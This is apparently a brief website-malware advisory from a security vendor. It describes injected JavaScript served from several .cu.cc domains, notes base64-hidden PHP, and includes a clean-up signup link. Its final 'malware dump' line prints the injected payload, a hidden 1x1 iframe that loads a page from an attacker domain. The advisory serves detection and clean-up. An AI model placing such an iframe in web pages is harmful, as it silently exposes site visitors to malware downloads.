Description: Javascript included from a .cu.cc domain, used to distribute malware.
Domains used:
juddwashere.cu.cc
millair.cu.cc
merenaal.cu.cc
hcirfiwcsmo.cu.cc
Affecting: Any web site (no traffic specified)
Clean up: Malware is generally hidden behind a base64 encoded block on PHP. Sign up here for our clean up: http://sucuri.net/signup
Malware dump:
<iframe src='http://juddwashere.cu.cc/showthread.php?t=20170030' width='1' height='1' frameborder='0' >